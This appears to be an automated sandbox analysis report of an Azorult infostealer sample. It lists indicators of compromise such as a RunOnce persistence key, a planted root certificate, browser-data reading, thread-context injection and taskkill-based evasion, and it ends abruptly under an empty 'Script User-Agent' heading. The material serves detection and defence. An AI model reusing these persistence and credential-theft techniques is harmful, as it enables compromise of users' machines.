azorult | 2adfa76af59257635bc4f6e842e6df00c5819ff889fb7c615c50a6c414c77878

System Information Discovery

Processes:

setups.tmpjfiag3g_gg.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation	jfiag3g_gg.exe

Loads dropped DLL 8 IoCs

Processes:

setups.tmprundll32.exe

pid process

1488 setups.tmp
1488 setups.tmp
1488 setups.tmp
1488 setups.tmp
1488 setups.tmp
1488 setups.tmp
1488 setups.tmp
4916 rundll32.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral2/memory/6680-711-0x0000000007640000-0x0000000007661000-memory.dmp	agile_net

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

multitimer.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\0vupdcmkj0m = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\P8K0PL31T3\\multitimer.exe\" 1 3.1617447926.60684bf6e7233"	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

156 ipinfo.io
158 ipinfo.io
199 ip-api.com
325 ipinfo.io
331 ipinfo.io
386 ip-api.com
112 api.ipify.org
376 api.ipify.org
526 api.ipify.org
222 api.ipify.org

flow	ioc
156	ipinfo.io
158	ipinfo.io
199	ip-api.com
325	ipinfo.io
331	ipinfo.io
386	ip-api.com
112	api.ipify.org
376	api.ipify.org
526	api.ipify.org
222	api.ipify.org

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 1136 set thread context of 5052 1136 svchost.exe svchost.exe

description	pid	process	target process
PID 1136 set thread context of 5052	1136	svchost.exe	svchost.exe

Drops file in Program Files directory 3 IoCs

Processes:

Full Program Features.exe

description	ioc	process
File created	C:\Program Files\unins0000.dat	Full Program Features.exe
File created	C:\Program Files\unins0000.dll	Full Program Features.exe
File created	C:\Program Files\unins.vbs	Full Program Features.exe

Drops file in Windows directory 3 IoCs

Processes:

MicrosoftEdge.exemultitimer.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 12 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4132	6888	WerFault.exe	Vidboxtest.exe
6772	5200	WerFault.exe	RunWW.exe
4192	5200	WerFault.exe	RunWW.exe
3748	5200	WerFault.exe	RunWW.exe
5016	5200	WerFault.exe	RunWW.exe
4876	5200	WerFault.exe	RunWW.exe
6492	5200	WerFault.exe	RunWW.exe
4384	5200	WerFault.exe	RunWW.exe
6252	5200	WerFault.exe	RunWW.exe
6072	4996	WerFault.exe	win1host.exe
5540	5200	WerFault.exe	RunWW.exe
6352	5200	WerFault.exe	RunWW.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

svchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

4872 timeout.exe
5548 timeout.exe

pid	process
4872	timeout.exe
5548	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe

Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

816 taskkill.exe
3800 taskkill.exe
6496 taskkill.exe
3708 taskkill.exe
7112 taskkill.exe
7364 taskkill.exe

pid	process
816	taskkill.exe
3800	taskkill.exe
6496	taskkill.exe
3708	taskkill.exe
7112	taskkill.exe
7364	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

Processes:

MicrosoftEdge.exe9okkyYBAu.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	9okkyYBAu.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exerundll32.exejfiag3g_gg.exeFull Program Features.exesvchost.exesvchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{MKUSM4Y3-Y0K1-VV65-WWVU-TITVMNYKUV21}	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{6E68A1EB-4CBA-4B06-B974-D07B68B58DC9}"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	jfiag3g_gg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	jfiag3g_gg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	jfiag3g_gg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{PEDLD6H3-W1C2-AP31-WRJR-WMIDOHREDO13}	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	Full Program Features.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ff3c68838928d701	jfiag3g_gg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{16096A13-6DCE-4E1E-9729-F8D71C6D96E3}"	jfiag3g_gg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{JAGSC2K0-K4Q1-LO31-YATQ-QCFVCPKLJD69}	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{XLCMX7L3-L6I1-MY60-TLXW-JIZNXKAMXM51}	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000ac5d7fe9be358e319eb9ffd2310a01a134846b8232d290942bb4e23041aad7c1f5f3a802e592d4b400426311fede83ab89c30001b684a7480103	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	jfiag3g_gg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	jfiag3g_gg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

askinstall20.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

5376 PING.EXE
3712 PING.EXE
3956 PING.EXE

pid	process
5376	PING.EXE
3712	PING.EXE
3956	PING.EXE

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
